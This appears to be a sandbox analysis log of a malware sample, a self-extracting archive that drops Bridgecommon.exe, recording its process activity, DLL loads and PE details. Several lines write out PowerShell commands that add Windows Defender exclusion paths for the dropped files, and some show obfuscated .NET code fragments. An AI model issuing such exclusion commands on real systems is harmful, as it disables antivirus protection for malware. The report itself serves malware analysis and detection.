                                    Source: C:\hyperContaineragent\Bridgecommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\hyperContaineragent\Bridgecommon.exe'
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4DA.tmp" "c:\Windows\System32\CSCA1C1A0ABC4644F3ABFA5FB833E2CF3E.TMP"
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: mscoree.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: version.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: uxtheme.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: windows.storage.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: wldp.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: profapi.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: cryptsp.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: rsaenh.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: cryptbase.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: sspicli.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: mscoree.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: version.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: uxtheme.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: windows.storage.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: wldp.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: profapi.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: cryptsp.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: rsaenh.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: cryptbase.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: version.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: wldp.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: profapi.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: version.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: wldp.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: profapi.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                    Source: Window Recorder Window detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exe Directory created: C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe
                                    Source: C:\hyperContaineragent\Bridgecommon.exe Directory created: C:\Program Files\Internet Explorer\en-GB\039065625c59a1
                                    Source: 3AAyq819Vy.exe Static file information: File size 2041114 > 1048576
                                    Source: 3AAyq819Vy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: 3AAyq819Vy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: 3AAyq819Vy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: 3AAyq819Vy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: 3AAyq819Vy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: 3AAyq819Vy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: 3AAyq819Vy.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 3AAyq819Vy.exe
                                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.pdb source: Bridgecommon.exe, 00000005.00000002.1911325001.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp
                                    Source: 3AAyq819Vy.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: 3AAyq819Vy.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: 3AAyq819Vy.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: 3AAyq819Vy.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: 3AAyq819Vy.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                    Data Obfuscation

                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, hpJE61kMAL8Awig2KFg.cs .Net Code: Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777245)),Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777259))})
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, hpJE61kMAL8Awig2KFg.cs .Net Code: Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777245)),Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777259))})
                                    Source: C:\hyperContaineragent\Bridgecommon.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline"
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exe File created: C:\hyperContaineragent\__tmp_rar_sfx_access_check_7365984
                                    Source: 3AAyq819Vy.exe Static PE information: section name: .didat
                                    Source: Bridgecommon.exe.0.dr Static PE information: section name: .text entropy: 7.4610435048156285
                                    Source: nFQRHbQjcuhfqIAubZpdQD.exe.5.dr Static PE information: section name: .text entropy: 7.4610435048156285
                                    Source: nFQRHbQjcuhfqIAubZpdQD.exe0.5.dr Static PE information: section name: .text entropy: 7.4610435048156285
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, stwjW6IrY3dA5D2SnIF.csHigh entropy of concatenated method names: 'KUfIIMnRlL', 'gdAd3QBTC2MRIxWkypQx', 'DExJx8BTz9Mt57t16ksa', 'KyPtn5BTq0TISJ6NgREk', 'wiRNBGBTpKRqc0QiZZXM', 'ujIIUweNVc', 'MbaFcYBTZ4TP9eo0eQMg', 'mQIILDBTP0Yv6D3G7eo2', 'KskMGDBTxFkpI8VS2OXo', 'v5naiYBTJNrlGofkpZZk'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, o85UtLpraMtZAmto0dI.csHigh entropy of concatenated method names: 'ae9WhwfC7SI', 'Gj8WhyffnnO', 'WMmswnBp5sARuwVaqMtG', 'YNRRmXBpwK1b9qJiHnE1', 'GcZ3G3BpyvYdAXOoCZWN', 'jUrxk9BpsgDPmeZLxJy9', 'xAZwnlBpm8n1TQTLYWmc'
